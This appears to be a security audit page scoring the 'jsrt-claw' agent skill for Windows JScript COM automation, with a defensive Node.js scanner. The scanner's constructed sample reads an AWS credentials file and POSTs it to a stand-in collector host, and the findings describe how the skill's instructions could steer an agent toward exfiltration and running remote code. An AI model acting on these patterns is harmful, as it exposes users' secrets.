Is gnh1201/jsrt-claw safe?

https://github.com/openclaw/skills/tree/main/skills/gnh1201/jsrt-claw

Score: 60/100 · CAUTION

jsrt-claw is a Windows JScript automation skill that teaches an agent to create and execute scripts using COM objects for filesystem access, HTTP communication, WMI reconnaissance, shell execution, and Office automation. The skill installs cleanly and showed no active malware behavior, but its content amounts to a comprehensive tutorial in Windows offensive tradecraft: the explicit combination of Scripting.FileSystemObject/ADODB.Stream (file read) with XMLHTTP/WinHTTP (network transmit) is the canonical data exfiltration pattern, and the instruction to fetch and inject polyfills from an external CDN at runtime introduces a supply-chain remote code execution risk. Deploy the skill only in explicitly authorized Windows automation contexts, after reviewing which COM capabilities the task actually needs and removing the rest.

Category Scores

Prompt Injection 72/100 · 30%
Data Exfiltration 45/100 · 25%
Code Execution 40/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 82/100 · 10%
Behavioral Reasoning 38/100 · 5%

Findings (10)

HIGH Complete Filesystem-Read + HTTP-Send Exfiltration Toolkit -40

The skill teaches both filesystem read (Scripting.FileSystemObject and ADODB.Stream) and HTTP transmission (XMLHTTP/WinHTTP COM objects). This is not dual-use ambiguity; it is the complete two-step pattern used by Windows credential stealers: open file, read bytes, POST to an endpoint. An agent following these instructions can exfiltrate any file readable by its user account from a Windows host with no additional components.

HIGH Remote Code Execution via External CDN Polyfill Injection -30

The skill instructs the agent to fetch JavaScript from cdnjs.cloudflare.com with a spoofed MSIE User-Agent, then inject and execute the fetched code before running the automation logic. This is a remote code execution pattern: the agent is directed to pull and run whatever a third-party CDN returns. A compromised CDN or a User-Agent-targeted response could inject malicious logic into every script generated by this skill; a BGP hijack adds a third route if the fetch is plain HTTP or certificate validation is disabled. Pinning the fetched bytes to a reviewed hash, or better, vendoring the polyfill with the skill so that no runtime fetch happens at all, would close this.

MEDIUM WScript.Shell Enables Arbitrary Shell Command Execution -20

The skill explicitly teaches WScript.Shell COM object usage for 'Executing Windows shell commands'. Any generated script following these instructions can run cmd.exe, PowerShell, or any binary as the agent's user. That is sufficient for persistence (WScript.Shell also exposes RegWrite, so Run-key entries need no external tool) and for lateral movement with the agent's credentials; privilege escalation would additionally require a separate weakness on the host, since the spawned shell inherits the agent's token.

MEDIUM WMI Impersonation for Deep System Reconnaissance -15

The skill teaches WMI access with impersonationLevel=impersonate, granting access to running process lists, installed software, hardware configuration, network interfaces, environment variables (which often contain API keys and passwords), and user account metadata. This is standard pre-exfiltration reconnaissance. Note that impersonate is the default impersonation level for local WMI scripting and is required for ordinary queries, so the moniker itself is not the concern; the breadth of classes the skill teaches is.

MEDIUM Agent Directed to Fetch External URLs -15

SKILL.md instructs the agent to make HTTP requests to cdnjs.cloudflare.com. The agent therefore contacts external infrastructure during script generation, revealing the host's egress IP and the fact that the skill is in use, potentially leaking context such as OS and JScript version through the User-Agent header, and giving the CDN a header it can key on to serve a targeted payload.

MEDIUM Outlook Automation Enables Silent Email Exfiltration -30

The skill lists Outlook.Application as an available COM object for 'Microsoft Office Automation'. Outlook COM automation can read all inbox emails, access contacts, send emails with exfiltrated data as attachments, and forward messages, with no visible UI to the user. This is a high-value post-exploitation capability. One caveat: Outlook's Object Model Guard prompts the user on programmatic address-book access and Send unless a current antivirus product is registered or Group Policy disables the guard, so 'silent' depends on the host's configuration.
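The exfiltration, WScript.Shell, WMI and Outlook findings above all reduce to one detection question: which COM ProgIDs does a generated script instantiate, and in what combination. The static scan below is an added example written for this page in Node.js JavaScript; it is not JScript and not code from jsrt-claw or WelsonJS. Its ProgID-to-capability table, severity rules and the three sample scripts are constructed for illustration.

```javascript
"use strict";
// Added example for this audit page (not code from jsrt-claw or WelsonJS):
// a static capability scan for Windows JScript (WSH) sources. It lifts the
// COM ProgIDs passed to ActiveXObject / CreateObject and the WMI moniker
// passed to GetObject, maps them to capabilities, and flags the
// file-read + network-send combination described in the HIGH finding.
// The ProgID -> capability table is this example's own classification.

const CAPABILITIES = {
  "scripting.filesystemobject": "file-read",
  "adodb.stream": "file-read",
  "msxml2.xmlhttp": "net-send",
  "msxml2.serverxmlhttp": "net-send",
  "microsoft.xmlhttp": "net-send",
  "winhttp.winhttprequest": "net-send",
  "wscript.shell": "shell-exec",
  "shell.application": "shell-exec",
  "outlook.application": "office-automation",
  "excel.application": "office-automation",
  "word.application": "office-automation",
};

// new ActiveXObject("ProgID"), WScript.CreateObject("ProgID"), CreateObject("ProgID")
const PROGID_RE = /(?:ActiveXObject|CreateObject)\s*\(\s*(["'])([^"']+)\1/gi;
// GetObject("winmgmts:...") WMI monikers
const WMI_RE = /GetObject\s*\(\s*(["'])(winmgmts:[^"']*)\1/gi;

function classify(progid) {
  const id = progid.toLowerCase();
  for (const [prefix, cap] of Object.entries(CAPABILITIES)) {
    // Accept versioned ProgIDs such as MSXML2.XMLHTTP.6.0 or WinHttp.WinHttpRequest.5.1
    if (id === prefix || id.startsWith(prefix + ".")) return cap;
  }
  return "unclassified";
}

function scanJScript(source) {
  const progids = new Set();
  const capabilities = new Set();
  for (const m of source.matchAll(PROGID_RE)) {
    progids.add(m[2]);
    capabilities.add(classify(m[2]));
  }
  for (const m of source.matchAll(WMI_RE)) {
    progids.add(m[2]);
    capabilities.add("wmi-query");
    if (/impersonationLevel\s*=\s*impersonate/i.test(m[2])) capabilities.add("wmi-impersonate");
  }
  // Rules are ordered by severity so findings[0] is the worst hit.
  const findings = [];
  if (capabilities.has("file-read") && capabilities.has("net-send")) {
    findings.push({ severity: "HIGH", rule: "file-read + net-send: exfiltration pattern" });
  }
  if (capabilities.has("shell-exec")) {
    findings.push({ severity: "MEDIUM", rule: "shell command execution" });
  }
  if (capabilities.has("wmi-query")) {
    findings.push({ severity: "MEDIUM", rule: "WMI reconnaissance" });
  }
  if (capabilities.has("office-automation")) {
    findings.push({ severity: "MEDIUM", rule: "Office automation (Outlook/Excel/Word)" });
  }
  return {
    progids: [...progids].sort(),
    capabilities: [...capabilities].sort(),
    findings,
    verdict: findings.length === 0 ? "NONE" : findings[0].severity,
  };
}

// Constructed JScript samples (not taken from the skill). String.raw keeps the
// JScript backslash escapes exactly as they would appear in a .js file.
const EXFIL_SAMPLE = String.raw`
var fso = new ActiveXObject("Scripting.FileSystemObject");
var txt = fso.OpenTextFile("C:\\Users\\me\\.aws\\credentials", 1).ReadAll();
var http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
http.Open("POST", "https://collector.example/upload", false);
http.Send(txt);
`;

const BENIGN_SAMPLE = String.raw`
var fso = WScript.CreateObject("Scripting.FileSystemObject");
fso.CopyFile("C:\\logs\\app.log", "C:\\logs\\app.log.1", true);
`;

const RECON_SAMPLE = String.raw`
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var procs = wmi.ExecQuery("SELECT Name, CommandLine FROM Win32_Process");
var sh = new ActiveXObject("WScript.Shell");
var ol = new ActiveXObject('Outlook.Application');
`;

for (const [name, src] of Object.entries({ EXFIL_SAMPLE, BENIGN_SAMPLE, RECON_SAMPLE })) {
  const r = scanJScript(src);
  console.log(name, r.verdict, r.capabilities.join(","));
}
```

Run it over the skill's generated scripts before they execute: the file-read plus net-send rule is exactly the two-step pattern the HIGH finding describes, and any ProgID the table does not know lands in unclassified for manual review. It is a lexical scan, so a ProgID assembled at runtime from string fragments will slip past it; treat a clean result as necessary, not sufficient.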

MEDIUM Agent Directed to Search External Project for Implementation Patterns -13

The skill instructs the agent to 'use a search function to look up' WelsonJS project information and source code. This is a runtime directive embedded in the skill: it causes the agent to perform external searches during task execution and potentially to consume and reproduce arbitrary code from that project.

LOW Embedded Executable JavaScript Code -10

The SKILL.md contains a complete, ready-to-run CreateObject function with error handling and fallback chains. This code is injected directly into the agent's context and may be reproduced verbatim in generated scripts, providing a production-ready COM object loader without any additional development needed.

LOW Canary Credential Files Read During Audit -18

All six honeypot credential files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .config/gcloud/application_default_credentials.json) were opened and read, per both inotify and auditd evidence. A simultaneous batch read of all six at timestamp 1771916262.144 is notable; a skill sweeping every canary in one pass would be a strong signal, but here the timing is consistent with the audit framework's own operations. The honeypot integrity check confirms the files were not modified, and no outbound connection other than the github.com clone was observed, so there is no evidence they were exfiltrated.

INFO Installation Behavior Was Normal -10

The sparse git clone connected only to github.com (140.82.121.4:443), which is expected. No unexpected processes were spawned, no files were written outside the skill directory, and no new listening sockets were opened post-install.